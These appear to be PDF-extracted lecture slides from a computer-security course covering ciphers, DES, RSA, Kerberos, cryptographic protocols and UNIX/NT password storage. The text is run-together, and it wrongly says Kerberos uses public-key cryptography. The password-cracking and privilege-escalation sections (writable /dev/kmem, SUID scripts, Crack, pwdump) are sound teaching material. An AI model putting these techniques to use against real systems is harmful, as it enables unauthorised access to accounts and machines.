Interruption - attacking the availability of a service (Denialof Service).

Interception - attacks confidentiality.

Modification - attacks integrity.

Fabrication - attacks authenticity. Note that you may notneed to decode a signal to fabricate it - you might justrecord and replay it.


Encoding and deciphering

I could have told her the truth - that the same cal-culation which had served me for deciphering themanuscript had enabled me to learn the word - but ona caprice it struck me to tell her that a genie had re-vealed it to me. This false disclosure fettered Madamed’Urfé to me. That day I became the master of hersoul, and I abused my power.

We call these systems symmetric key systems...


Symmetric key systems

XPKi[P]P

X(Plaintext)(Plaintext)

KiKi


Simple ciphers - transposition

Transposition ciphers just re-order the letters of the originalmessage. This is known as an anagram:

• parliament is an anagram of partial men

• Eleven plus two is an anagram of Twelve plus one

Perhaps you would like to see if you can unscramble “ageprison”, or “try open”.


Transposition

Detect a transposition cipher with the frequencies of theletters, and letter pairs.

If the frequency of single letters in ciphertext is correct,but the frequencies of letter pairs is wrong, then the ci-pher may be a transposition.

This sort of analysis can also assist in unscrambling atransposition ciphertext, by arranging the letters in theirletter pairs.


Simple ciphers - substitution

Substitution cipher systems encode the input stream us-ing a substitution rule.

The Cæsar cipher is an example of a simple substi-tution cipher system, but it can be cracked in at most25 attempts by just trying each of the 25 values in thekeyspace.


Substitution

Code Encoding

A Q

B V

C X

D W

... ...

If the mapping was more randomly chosen it iscalled a monoalphabetic substitution cipher, and thekeyspace for encoding 26 letters would be 26! − 1 =403, 291, 461, 126, 605, 635, 583, 999, 999.


Substitution

If we could decrypt 1, 000, 000 messages in a second,then the average time to find a solution would be about6, 394, 144, 170, 576 years!

We might be lulled into a sense of security by these bignumbers, but of course this sort of cipher can be subjectto frequency analysis.


Frequency analysis

In the English language, the most common letters are: "E TA O N I S H R D L U..." (from most to least common), andwe may use the frequency of the encrypted data to makegood guesses at the original plaintext.

We may also look for digrams and trigrams (th, the).


Vigenère

The Vigenère cipher is a polyalphabetic substitution ci-pher invented around 1520.

We use an encoding/decoding sheet, called a tableau,and a keyword or key sequence.


Vigenère

A B C D E F G H ...

A A B C D E F G H ...

B B C D E F G H I ...

C C D E F G H I J ...

D D E F G H I J K ...

E E F G H I J K L ...

F F G H I J K L M ...

G G H I J K L M N ...

H H I J K L M N O ...

... ... ... ... ... ... ... ... ... ...


Vigenère

If our keyword was BAD, then encoding HAD A FEED wouldresult in

Key B A D B A D B A

Text H A D A F E E D

Cipher I A G B F H F D

If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.


Analysis

The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key

IC =1

N(N − 1)

25∑

i=0

Fi(Fi − 1)

where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.


Index of coincidence

#!/usr/bin/perl$skip=$ARGV[0] ;@text=<stdin> ;$all=join(”,@text) ;$all =~ tr/a-z/A-Z/ ;$all =~ tr/A-Z//cd ;$header=substr($all,0,$skip) ;$shifted = substr($all,$skip).$header ;@alltxt=split(//,$all) ; @shiftxt=split(//,$shifted) ;foreach $i(0..$#alltxt)

if($alltxt[$i] eq $shiftxt[$i]) $count++ ;printf("Index of Coincidence is: %2f\n",$count/$#alltxt) ;

Show analysis using shifts of 1...2...3...


Index of coincidence

The ideas here were developed by William F. Friedmanin his Ph.D.

Friedman also coined the words “cryptanalysis” and“cryptology”.

Friedman worked on the solution of German code sys-tems during the first (1914-1918) world war, and later be-came a world-renowned cryptologist.


This session


• Encryption




S-box

4:22:4 Permutation

(3,4,2,1)


S-boxes and P-boxes

The S-box (Substitution-Box) is a hardware device whichencodes n bit numbers to other n bit numbers and canbe represented by a permutation.

A P-box is just a simple permutation box.

If you use an S-box and a P-box at once, you have aproduct cipher which is generally harder to decode.


DES - Data Encryption Standard

DES was first proposed by IBM using 128 bit keys, butits security was reduced by NSA (the National SecurityAgency) to a 56 bit key.

At 1ms/GUESS. It would take 1080 years to solve 128 bitkey encryption.

The DES Standard gave a business level of safety, andis a product cipher.


DES - Data Encryption Standard

The (shared) 56 bit key is used to generate 16 subkeys,which each control a sequenced P-box or S-box stage.

DES works on 64 bit messages called blocks.

If you intercept the key, you can decode the message.

However, there are about 1017 keys.


Feistel

+ f

+ f

+ f

+ f

+ f

+ f

K2

K1

K0

K1

K0

K2

l0 r0

l0 r0

l1 r1

l2 r2

l3 r3

l3 r3

l2 r2

l1 r1

Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.


DES modes of operation

The US government specifically recommends not usingthe weakest simplest mode for messages, the ElectronicCodebook (ECB) mode.

They recommend the stronger and more complex CipherFeedback (CFB) or Cipher Block Chaining (CBC) modes.

The CBC mode XORs the next 64-bit block with the resultof the previous 64-bit encryption, and is more difficult toattack.



DES

Ctext

msg

Electronic Code Book

DES

Ctext

msg

DES

Ctext

msg

Cipher Block Chaining

Initial vector


DES software

DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which mustbe included in any C source using the DES library:

#include “des.h”//// - Your calls


DES software

After initialization of the DES engine, the library provides asystem call which can both encrypt and decrypt:

int des cbc encrypt(clear, cipher, schedule, encrypt)

where the encrypt parameter determines if we are to enci-pher or decipher.

The schedule contains the secret DES key.


Case study: Amoeba capabilities

All Amoeba objects are identified by a capability stringwhich is encrypted using DES encryption. A capability islong enough so that you can’t just make them up.

If you have the string, you have whatever the capabilityallows you. If you want to give someone some access toa file, you can give them the capability string. They placethis in their directory, and can see the file.


Case study: Amoeba capabilities

object

identify the objectthe server uses to

Internal number which

Identifies whichoperations are

(48 bits) (24 bits) (8 bits) (48 bits)

Protects against forging

allowedwhich manages the Identifies the server

CheckfieldRightsObject IDServer Port

To further prevent tampering, the capability is DES en-crypted. The resultant bit stream may be used directly, orconverted to and from an ASCII string with the a2c and c2acommands.


This session


• Encryption




Public key systems

In 1976 Diffie and Hellman published the paper “New Di-rections in Cryptography”, which first introduced the ideaof public key cryptography.

Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.

For example, we have the discrete logarithm problem inwhich it is relatively easy to calculate n = gk mod p giveng, k and p, but difficult to calculate k in the same equation,given g, n and p.


Diffie-Hellman key agreement

Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.

g mod p

p,g

ba

p,g,a

b

Ted

BobAlicep,g,b

ag mod p

g mod pg mod p

bg mod pag mod p


Knowledge different

• All participants know two system parameters p, and g

• Alice and Bob each have a secret value (Alice has a andBob has b)

• Alice and Bob each calculate and exchange a public key(ga mod p for Alice and gb mod p for Bob).

• Ted knows g, p, ga mod p and gb mod p, but not a or b.



Both Alice and Bob can now calculate the value gab mod p.

1. Alice calculates (gb mod p)a mod p = (gb)a mod p.

2. Bob calculates (ga mod p)b mod p = (ga)b mod p.

And of course (gb)a mod p = (ga)b mod p = gab mod pwhich is the shared key.



Ted has a much more difficult problem. It is difficult to cal-culate gab mod p without knowing either a or b. The algo-rithmic run-time of the (so-far best) algorithm for doing thisis in

O(ec√

r log r)

where c is small, but ≥ 1, and r is the number of bits in thenumber.



By contrast, the enciphering and deciphering process maybe done in O(r):

Bit size Enciphering Discrete logarithm solution

10 10 23

100 100 1,386,282

1,000 1,000 612,700,000,000,000,000,000,000


Encryption

(Plaintext)XX

P

K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)

K1[P]

K2

P


Authentication

K2

XP

K1

PK1[J2[P]]

J1J2

XXX


This session


• Encryption




RSA (Rivest, Shamir, Adelman)

This public key system relies on the difficult problem of try-ing to find the complete factorization of a large composite9

integer whose prime factors10 are not known.

9An integer larger than 1 is called composite if it has at least one divisor larger than1.

10The Fundamental Theorem of Arithmetic states that any integer N (greater than0) may be expressed uniquely as the product of prime numbers.


RSA hacks

Two RSA-encrypted messages have been cracked:

• The inventors of RSA published a 129-digits (430 bits)RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.

• A year later, a 384-bit PGP key was cracked. It needed1300 MIPS-years to factor the key in three months.

Note that these efforts each only cracked a single RSA key.


RSA hacks

If you happen to be able to factor the following number,please tell Hugh - we can split US$200,00011!

25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357

11US$150,000 for me, US$50,000 for you...


RSA coding algorithms

Below are outlined the four processes needed for RSA en-cryption:

1. Creating a public key

2. Creating a secret key

3. Encrypting messages

4. Decoding messages


To create public key Kp

1. Select two different large primes P and Q.

2. Assign x = (P − 1)(Q− 1). (Does this ring a bell?)

3. Choose E relative prime to x. (This must satisfy conditionfor Ks given later)

4. Assign N = P ∗Q.

5. Kp is N concatenated with E.


To create private (secret) key Ks

1. Choose D: D ∗ E mod x = 1.

(a) (i.e. multiplicative inverses)(b) another way: DE = k(P − 1)(Q− 1) + 1

2. Ks is N concatenated with D.


To encode plain text m

1. Pretend m is a number.

2. Calculate c = mE mod N .


To decode c back to m

1. Calculate m = cD mod N .

2. ....WHY?....


...Why?...

cD mod N = m

ED mod N

= mk(P−1)(Q−1)+1 mod PQ

= m ∗mk(P−1)(Q−1) modPQ

• mP−1 mod P = 1, so (m(P−1))k(Q−1) modP = 1

• mQ−1 mod Q = 1, and so (tutorial) (m(P−1))k(Q−1) modPQ = 1.

cD mod N = m

ED mod N


RSA code

#!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj$/=unpack(’H*’,$ );$ =‘echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1lK[d2%Sa2/d0$^Ixp"|dc‘;s/\W//g;$ =pack(’H*’,/((..)*)$/)

and then

• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa

• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa


Testing large numbers for primality

RSA requires us to generate large prime numbers, but thereis no algorithm for constructing arbitrarily large prime num-bers. Instead we use statistical testing methods to deter-mine primality.Quiz! Is 162, 259, 276, 829, 213, 363, 391, 578, 010, 288, 127prime12?After choosing a large random (odd) number p, we canquickly see if p is divisible by 2, 3 and so on (say all primesup to 1000). If our number p passes this, then we can per-form some sort of statistical primality test.

12Note that this is only a 33 digit number, and we typically use prime numbers withhundreds of digits.


Lehmann test

1. Choose a random number w(for witness) less than p

2. If w(p−1)/2 6≡ ±1 mod p then p is not prime

3. If w(p−1)/2 ≡ ±1 mod p then the likelihood is less than 0.5that p is not prime

Repeat the test over and over, say n times. The likelihoodof a false positive will be less than 1

2n. Other tests, such asthe Rabin-Miller test may converge more quickly.


Primes is in P!

Group at the Indian Institute of Technology have discov-ered the unexpected result that testing a number for pri-mality can be done in polynomial time, rather than usingprobabilistic tests as just shown.

This is unlikely to affect the effectiveness of public keysystems.

The paper is only 7 pages long and is beautifully writ-ten...


Case study: PGP

PGP (Pretty Good Privacy) is a public key encryptionpackage to protect E-mail and data files.

It lets you communicate securely with people you’venever met, with no secure channels needed for prior ex-change of keys.

PGP can be used to append digital signatures to mes-sages, as well as encrypt the messages, or do both.


Case study: PGP

It uses various schemes including patented ones likeIDEA and RSA.

The patent on IDEA allows non-commercial distribution,and the RSA patent has expired.

However there are also commercial versions of PGP.

PGP can use, for example, 2048 bit primes, and it is con-sidered unlikely that PGP with this level of encryption canbe broken.


Chapter 8

Lecture 8 - Protocols


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to and including today...


Last session


• Encryption




This session

• Kerberos

• Voting

• Contract signing


Summary

Substitution, Vigenère, index of coincidence

DES, Feistel, modes of operation

Public key, Diffie Hellman, RSA


Vigenère

If our keyword was BAD, then encoding HAD A FEED wouldresult in

Key B A D B A D B A

Text H A D A F E E D

Cipher I A G B F H F D

If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.


Analysis

The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key

IC =1

N(N − 1)

25∑

i=0

Fi(Fi − 1)

where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.


DES - Feistel

+ f

+ f

+ f

+ f

+ f

+ f

K2

K1

K0

K1

K0

K2

l0 r0

l0 r0

l1 r1

l2 r2

l3 r3

l3 r3

l2 r2

l1 r1

Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.



DES

Ctext

msg

Electronic Code Book

DES

Ctext

msg

DES

Ctext

msg

Cipher Block Chaining

Initial vector


Public key systems

Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.

(Plaintext)XX

P

K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)

K1[P]

K2

P


Authentication

K2

XP

K1

PK1[J2[P]]

J1J2

XXX



Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.

g mod p

p,g

ba

p,g,a

b

Ted

BobAlicep,g,b

ag mod p

g mod pg mod p

bg mod pag mod p


RSA coding algorithms

The four processes needed for RSA encryption:

1. Creating a public key

2. Creating a secret key

3. Encrypting messages

4. Decoding messages


Uses of encryption

1. Generating encrypted passwords with 1-way functions

2. Checking integrity by appending digital signature

3. Checking the authenticity of a message.

4. Encrypting timestamps with messages to prevent replayattacks.

5. Exchanging a key.


Protocols

Systems in which the protocol plays a large part:

1. Kerberos protocol for distributing keys

2. Voting protocols

3. Contract signing protocols

These three protocols are by no means the only ones.


Other examples

Key distribution

Clipper

Oblivious transfer, in which two parties can complete ajoint computation, without either party revealing any un-necessary data.


Kerberos/Cerberus


Kerberos

Network authentication protocol.

Strong authentication for client/server applications usingpublic key cryptography.

Kerberos is freely available in source form

Kerberos is also available in commercial products.

Client can prove its identity to a server (and vice versa)across an insecure network connection.


Kerberos

After a client and server have used Kerberos to provetheir identity, they can also encrypt all of their commu-nications to assure privacy and data integrity as they goabout their business.

Must have a Key Distribution Center (KDC)

Kerberos uses Needham-Schroeder protocol.


Kerberos

Client

Server

(6)

(5)

KDC

(4)(3)(2)

Ticket grantingAuthentication

(1)


Kerberos

When a client first authenticates to Kerberos, she:

1. Talks to KDC, to get a Ticket Granting Ticket

2. Uses that to talk to the Ticket Granting Service

3. Uses the ticket, to interact with the server.

This way a user doesn’t have to reenter passwords everytime they wish to connect to a Kerberized service. If theTicket Granting Ticket is compromised, an attacker can onlymasquerade as a user until the ticket expires.


Kerberos protocol

Two sorts of credentials: tickets and authenticators .

A ticket Tc,s contains the client’s name and network ad-dress, the server’s name, a timestamp and a session key.This is encrypted with the server’s secret key (so that theclient is unable to modify it).

An authenticator Ac,s contains the client’s name, a times-tamp and an optional extra session key. This is encryptedwith the session key shared between the client and theserver.


Kerberos protocol

A key Kx,y is a session key shared by both x and y.

When we encrypt a message M using the key Kx,y wewrite it as MKx,y.


Kerberos protocol

Alice wants session key for communication with Bob:

• Alice sends message to Ted containing her identity, Ted’sTGS identity, and one-time value (n) : a, tgs, n.

• Ted responds with a key encrypted with Alice’s secret key(which Ted knows), and a ticket encrypted with the TGSsecret key: Ka,tgs, nKa Ta,tgsKtgs.Alice now has ticket and session key: Ta,tgsKtgs, Ka,tgs

• Alice can prove her identity to the TGS, as she has ses-sion key Ka,tgs, and Ticket Granting Ticket : Ta,tgsKtgs.


Kerberos protocol

Later, Alice can ask the TGS for a specific service ticket:

• When Alice wants a ticket for a specific ser-vice (say with Bob), she sends an authenticatoralong with the Ticket Granting Ticket to the TGS:Aa,bKa,tgs Ta,tgsKtgs , b, n.

• The TGS responds with a suitable key and a ticket:Ka,b, nKa,tgs Ta,bKb.

• Alice can now use an authenticator and ticket directly withBob: Aa,bKa,b Ta,bKb.


Weaknesses

Host security: Kerberos makes no provisions for host se-curity; it assumes that it is running on trusted hosts withan untrusted network.

KDC compromises: Kerberos uses a principal’s password(encryption key) as the fundamental proof of identity.

Salt: This is an additional input to the one-way hash algo-rithm.


Voting protocols

A voting protocol is one in which

• independent systems vote in a kind of election, and

• afterwards we can check that the vote was correct.

• Each voter is only allowed a single vote, and

• the system should be corruption-proof.


Voting protocols

Example with Alice, Bob and Charles (!), who vote and thenencrypt and sign a series of messages using public-key en-cryption. For example, if Alice votes vA, then she will broad-cast to all other voters the message

RA(RB(RC(EA(EB(EC(vA))))))

where RA is a random encoding function which adds a ran-dom string to a message before encrypting it with A’s publickey, and EA is public key encryption with A’s public key.


Voting protocols

Each voter then signs the message and decrypts onelevel of the encryption.

At the end of the protocol, each voter has a completesigned audit trail and is ensured of the validity of the vote.


Tossing a coin

Alice and Bob want to toss a coin

Alice calculates two primes p, q and calculates N = pq,sends N to Bob. N = 35 = 5 ∗ 7

If Bob can factorize the number, then Bob wins a cointoss.

Bob selects random x, and sends x2 mod N = y to Alice.y = 312 mod 35 = 16


Tossing a coin

Alice calculates the four square roots of 16:

• 42 mbox 35 = 16

• 312 mbox 35 = 16

• 242 mbox 35 = 16

• 112 mbox 35 = 16

This is easy for Alice, as she knows the prime factors of N .She then sends one of these back to Bob.


Tossing a coin

If Bob receives x or −x, then he learns nothing, but

if Bob receives either of the other values, he can add thisto x, and then find the GCD of the result with N:

GCD(24 + 31, 35) = GCD(55, 35)

= 5

Alice is unable to tell she has divulged the factor


Oblivious transfer

In an oblivious transfer, randomness is used to convinceparticipants of the fairness of some transaction

In a coin-tossing example, Alice knows the prime factorsof a large number, and if Bob can factorize the number,then Bob wins a coin toss.

A protocol allows Alice to either divulge one of the primefactors to Bob, or not, with equal probability.

Alice is unable to tell if she has divulged the factor, andso the coin toss is fair.


Contract signing

Signing contracts can be difficult.

If one party signs the contract, the other may not. Wehave one party bound by the contract, and the other not.

In addition, both may sign, and then one may say “I didn’tsign any contract!” afterwards.


Contract signing

Oblivious transfer used for contract-signing where

• Up to a certain point neither party is bound

• After that point both parties are bound

• Either party can prove that the other party signed

Alice and Bob exchange signed messages, agreeing to bebound by a contract with ever-increasing probability


Contract signing

In the event of early termination of the contract, eitherparty can take the messages they have to an adjudica-tor, who chooses a random probability value (42% say)before looking at the messages.

If both messages are over 42% then both parties arebound.

If less then both parties are free.


Chapter 9

Lecture 9 - System(in)security


Admininstration

Results are out - please check.

Assignment 1

hardcopy to tutor or me, email softcopy to me.

Assignment 2 ... better get going.


Last session

• Kerberos

• Voting

• Contract signing


This session

• Ethics and computing

• Organizations and standards

• UNIX passwords

• NT passwords


Stranger danger...

One of my sons was taught stranger-danger at hisschool. We were asked to quiz him afterwards, sowe asked him if he should accept a lift in a car witha stranger. He immediately replied “No way! ”. Wethen asked: “What if he offered you sweets? ”, buthe still replied “No way! ”. Finally we asked: “Whynot? ”, to which he replied “Because you might notget any !”


Ethics

Moral development stages:

Stage 1: Obedience and punishment

...

Stage 6: Individual principles of conscience - an orienta-tion not only toward existing social rules, but also towardthe conscience as a directing agent, mutual trust and re-spect, and principles of moral choice involving logical uni-versalities and consistency. If one acts otherwise, self-condemnation and guilt result.


Ethics

It is my expectation, and requirement, that you are ableto maturely evaluate rights and wrongs.

In these sections of the course, I will be outlining systemswhich demonstrate poor cryptographic techniques, andas a result, can be defeated.

A more cynical view might be that I am teaching hacking

...this is not my intent...


Ethics and computing

No new ethical dilemmas... Perhaps the only significant dif-ference is that the computer crimes are so easy.

Software duplication: = theft.

Using information: = insider trading.

E-mail abuse: = abuse.


Network administrator’s dilemma

Network administrators often come to learn things abouttheir ’clients’

Without asking the client, they should not make use ofthat information.

The network administrator’s dilemma: How to controlbad-guys without trampling over rights.


Professional codes of ethics

Most professional bodies13 have formal written codes ofethics

The computer industry has yet to develop a standardcode of conduct

If computer crime continues to rise, codes may be im-posed on it.

13For example: Medical boards.


ACS code of ethics

1. I will serve the interests of my clients and employers, my employeesand students, and the community generally, as matters of no lesspriority than the interests of myself or my colleagues....

Within a general framework of ethical and moral responsi-bility, codes such as this one can help clarify grey areas ofconcern.


Insecurity - threats are real

For example:

• Pentagon machines were repeatedly corrupted by un-known intruders during the Gulf war. The intruders ap-peared to be doing it as part of a contest.

• German hackers demonstrated on TV a method of trans-ferring money into their own accounts using ActiveX con-trols downloaded to an unsuspecting person’s machine.

• Estimates of computer theft in the US range from 1 to 30$billion/year - most of which goes unreported.


Taxonomy of insecurity?

Each new attack adds new levels to the structure:

• physical insecurity, and

• password insecurity

Some of the security of modern systems is provided throughcryptographic techniques (particularly password storage),the subject today.


Non-cryptographic cracking

Misconfiguration: If excessive permissions exist on cer-tain directories and files, these can lead to gaining higherlevels of access. For example, on a UNIX system, if/dev/kmem is writable it is possible to rewrite your UIDto match root’s.

Poor SUID: Sometimes there are scripts (shell or Perl) thatperform certain tasks and run as root. If the scripts arewritable by you, you can edit it and run it.



Buffer overflow: Buffer overflows are typically used tospawn root shells from a (server) process running asroot.

Race conditions: A race condition is when a program cre-ates a short opportunity for attack by opening a smallwindow of vulnerability. For example, a program that al-ters a sensitive file might use a temporary backup copyof the file during its alteration.



Poor temporary files: Many programs create temporaryfiles while they run. If a program runs as root and is notcareful about where it puts its temporary files and whatpermissions these files have, it might be possible to uselinks to create root-owned files.

Attacks using these methods can be launched locally onthe target machine, or often remotely, by exploiting serviceswith loopholes.


Protection

Can you protect yourself against attacks?

• Hack/crack yourself:

• Be vigilant:

• Reduce reliance:

• Use more secure systems:

• Update systems:

Finally: “Its not the end of the world!”


This session



• UNIX passwords

• NT passwords


Computer Emergency Response Team

The CERT Coordination Center is the organizationthat grew from the computer emergency responseteam formed by the Defense Advanced ResearchProjects Agency (DARPA) in November 1988 in re-sponse to the needs identified during the Internetworm incident. The CERT charter is to work with theInternet community to facilitate its response to com-puter security events involving Internet hosts, to takeproactive steps to raise the community’s awarenessof computer security issues, and to conduct researchtargeted at improving the security of existing systems.


CERT

If you are ever involved in a computer security incident itis useful to get in touch with CERT.

They provide incident reports and advisories, and can li-aise with other system administration people if the attackon your system comes from outside your organization.


CERT Incident Note IN-99-04

Here is an excerpt from an incident report:Similar Attacks Using Various RPC Services

Thursday, July 22, 1999

Overview

We have recently received an increasing number of reports that intruders are using similar methodsto compromise systems. We have seen intruders exploit three different RPC service vulnerabilities;however, similar artifacts have been found on compromised systems.

...


SIGINT

Signals Intelligence (SIGINT) broke the Japanese mili-tary code and learned of plans to invade Midway Island.

In 1943 they began the VENONA project to examine en-crypted Soviet diplomatic communications.

The messages were double-encrypted and were ex-tremely difficult to crack.

Almost all of the US KGB messages in 1944 and 1945were broken between 1947 and 1952.


NSA - National Security Agency

Successor of SIGINT

The National Security Agency is the USA’s cryptologicorganization.

It coordinates, directs, and performs highly specializedactivities to protect U.S. information systems and pro-duce foreign intelligence information.


NSA - National Security Agency

NSA employs the country’s premier codemakers andcodebreakers.

It is said to be the largest employer of mathematicians inthe United States and perhaps the world.


Rainbow documents

The NSA created various documents describing the cri-teria for evaluating the security behaviour of machines.

These criteria were published in a series of documentswith brightly coloured covers, and hence became knownas the Rainbow series. (red book, yellow book...)


C2 security

DOD 5200.28-STD - “Department of Defense Trusted Com-puter System Evaluation Criteria”:

• To provide a standard to manufacturers (for security fea-tures related to confidentiality)...

• To provide DoD components with a metric with which toevaluate the degree of trust...

• To provide a basis for specifying security requirements inacquisition specifications.


C2 security example

The TCB14 shall require users to identify themselves toit before beginning to perform any other actions that theTCB is expected to mediate.

Furthermore, the TCB shall use a protected mechanism(e.g., passwords) to authenticate the user’s identity.

14Trusted Computing Base.


Microsoft and C2

Windows NT Workstation vs 3.5 with U.S. Service Pack 3was the first Microsoft product that has completed C2 test-ing, and is only certified if using the same hardware, andinstalled software, and does not include any network con-nection. The NT utility c2config.exe sets up an NT systemto pass the C2 tests.

The 1998 attacks on the Pentagon involved theft and mod-ification of data, as well as denial-of-service. The attackedmachines were C2-secure Windows NT machines.


UNIX and C2

Many UNIX systems have also got C2 certification, andcome configured this way from the manufacturer.

There are numerous examples of hacked UNIX sys-tems found on the Internet. In 1996, a site I managedin New Zealand was the target of a malicious attack byintruders from Australia and Belgium.

Given all this, C2 certification is probably not a good guideas to the security of your system.


This session



• UNIX passwords

• NT passwords


Password security

Morris and Thompson article:

http://citeseer.nj.nec.com/morris79password.html

Computer generated passwords more predictable thanuser ones...


http://citeseer.nj.nec.com/morris79password.html

UNIX password security

UNIX systems are traditionally open systems, given theirbackground in university environments.

As such, the security on them is often minimal.

It is common for UNIX accounts to be made availablerelatively freely.

For example, at the MIT Media lab15 all computers havebeen password-free until recently.

15MIT - home of Kerberos!


UNIX password security

UNIX systems are vulnerable to a wide range of attacks,particularly internal attacks.

All Unix systems have a root account.

This account has a UID and GID of zero, and once rootaccess is obtained on a UNIX system, there is very littlethat cannot be done.


UNIX accounts

Account passwords are constructed to meet the followingrequirements:

• Each password has at least six characters.

• Only the first eight characters are significant.


UNIX accounts

There are many other accounts found on Unix systems, notjust those for clients:

sysadm - A System V administration account, and

daemon - A daemon process account, and

uucp - The UUCP owner, and

lp - The print spooler owner.

When protecting a UNIX system, we must protect all theseaccounts - not just root.


UNIX password file

Account information is kept in a file called /etc/passwd.

It normally consists of seven colon-delimited fields, andmay look like the following:

hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh


/etc/passwd fields

hugo: The account or user name.

aAbBcJJJx23F5 5: A one-way encrypted (hashed)password

501: The UID - unique user number

100: The GID - group number for user.

Hughs Account: Account information.

/home/hugo: The account’s home directory

/bin/tcsh: A program to run when you log in


UNIX passwords

When you log in with your account name and password,the password is encrypted and the resulting hash is com-pared to the hash stored in the password file.

If they are equal, the system accepts that you’ve typed inthe correct password and grants you access.


UNIX passwords

UNIX uses a DES-like algorithm to calculate the en-crypted password.

The password is used as the DES key (eight 7-bit charac-ters make a 56 bit DES key) to encrypt a block of binaryzeroes.

The result of this encryption is the hash value.

Note: the password is not encrypted, it is the key used toperform the encryption!


UNIX salt

A strengthening feature of UNIX is that it introduces tworandom characters in the alogrithm (the salt).

This ensures that two equal passwords result in two dif-ferent hashes.

From viewing the UNIX password file you can not tell iftwo persons have the same password.


UNIX salt

To prevent crackers from simply encrypting an entiredictionary and then looking up the hash, the salt wasadded to the algorithm to create a possible 4096 differenthashes for a particular password.

This lengthens the cracking time because it becomes alittle harder to store an encrypted dictionary online as theencrypted dictionary now would have to take up 4096times the disk space.

This does not make password cracking harder, just moretime consuming.


Crypt code

Sample crypt code from LINUX uClibc. The code has thefollowing structure:

extern char * crypt(const char *key, const char *salt) /* Are we supposed to be using the MD5 replacement/* instead of DES... */

if (salt[0]==’$’ && salt[1]==’1’ && salt[2]==’$’)return md5 crypt(key, salt);

elsereturn des crypt(key, salt);


Cracking

It is very time consuming, but given enough time, bruteforce cracking will get the password.

The hashed passwords are compared with the entry inthe /etc/passwd file.

BTW - You cannot try to log in using all the possible pass-words, as UNIX systems enforce 10 second timeouts af-ter three consecutive login failures.


Dictionary cracking

Dictionary password cracking is the most popularmethod for cracking Unix passwords.

The cracking program will take a word list, and one at atime try to crack one or all of the passwords listed in thepassword file.

Some password crackers will filter and/or mutate:

substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.


Dictionary cracking

A popular cracking utility is called Crack .

Crack can use user-definable rules for word manipula-tion/mutation to maximize dictionary effectiveness.

Crack merges dictionaries, turns the password files intoa sorted list, and generates lists of possible passwordsfrom the merged dictionary or from information gleanedabout users from the password file.


/etc/shadow passwords

Once the password hashes are moved to the shadow file,its permissions are changed as follows:

opo 35# ls -l /etc/shadow-r-------- 1 root sys 3429 Aug 20 14:46 /etc/shadow

opo 36#

These permissions ensure that ordinary users are unable tolook at the password hashes, and hence are unable to trydictionary attacks.


This session



• UNIX passwords

• NT passwords


Microsoft password security

Two one-way password hashes are stored on NT systems:

• a LanManager hash, and

• a Windows NT hash.

The LanManager hash supports the older LanManager pro-tocol originally used in Windows and OS/2. In an all-NT en-vironment it is desirable to turn off LanManager passwords,as it is easier to crack. The NT method uses a strongeralgorithm and allows mixed-cased passwords.


Microsoft password security

The database containing these hashes on an NT systemis called the SAM (Security Access Manager)

If you have administrative access16, the program pw-dump can extract the hashes.

16Originally, anyone could extract the hashed passwords from the SAM, as Microsoftbelieved that “if they didn’t tell anyone the algorithms they used, no-one could discoverwhat they had done”. Security through obscurity is not a safe strategy, and JeremyAllison was able to de-obfuscate the SAM entries relatively quickly.


Microsoft salt

Microsoft does not salt during hash generation, so oncea potential password has generated a hash it can bechecked against all accounts.

The cracking software takes advantage of this.


LanManager encryption

LanManager encryption is created by taking the user’splaintext password, capitalising it, and either truncatingto 14 bytes, or padding to 14 bytes with null bytes.

This 14 byte value is used as two 56-bit DES keys to en-crypt an eight byte value, forming a 16 byte value whichis stored by the server and client.

This value is known as the hashed password .


NT encryption

Windows NT encryption is a higher quality mechanism,consisting of doing an MD4 hash on a Unicode version ofthe user’s password.

This also produces a 16 byte hash value that is non-reversible.


NT Password security

Note that the LANManager hash is similar to UNIX levelof cyptography

The NT hash is better

But... neither use strong encryption, and

the network login mechanism has some problems.


Challenge response

BAD GUY!

PDCCLIENT

Snooping!

Login network traffic


Challenge-response protocol

When a client wishes to use a resource, it first requestsa connection and negotiates the protocol that the clientand server will use.

In the reply to this request the server generates and ap-pends an 8 byte, random value - this is stored in theserver after the reply is sent and is known as the chal-lenge .

It is different for every client connection.



The client then uses the hashed password (16 byte val-ues described above), appended with 5 null bytes, asthree 56 bit DES keys, each of which is used to en-crypt the challenge 8 byte value, forming a 24 byte valueknown as the response .

